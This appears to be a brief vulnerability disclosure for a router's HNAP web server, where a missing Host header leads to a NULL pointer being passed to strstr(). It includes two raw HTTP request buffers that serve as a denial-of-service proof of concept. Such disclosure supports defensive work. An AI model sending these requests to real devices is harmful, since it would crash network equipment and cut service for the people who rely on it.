The function sub_424320() is registered to handle requests to the URL '/'. It passes a1[330] to strstr(), as long as v10 is not zero. We can control v10 by sending a /HNAP1/SetIgnoreWizardConfig request. However, a1[330] can be NULL if 'Host' is not specified in the header. Passing a NULL pointer to strstr() could crash the server unexpectedly.
This allows an authorized attacker to perform a DoS attack.
buf1 = b'POST /HNAP1/ HTTP/1.1\\r\\nCookie: hasLogin=1;\\r\\nContent-Length: 312\\r\\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\\r\\nSOAPAction: "<http://purenetworks.com/HNAP1/SetIgnoreWizardConfig>"\\r\\n\\r\\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:xsd="<http://www.w3.org/2001/XMLSchema>" xmlns:soap="<http://schemas.xmlsoap.org/soap/envelope/>"><soap:Body><SetIgnoreWizardConfig xmlns="<http://purenetworks.com/HNAP1/>" /></soap:Body></soap:Envelope>\\r\\n'
buf2 = b'POST / HTTP/1.1\\r\\nContent-Length: 1\\r\\n\\r\\nA'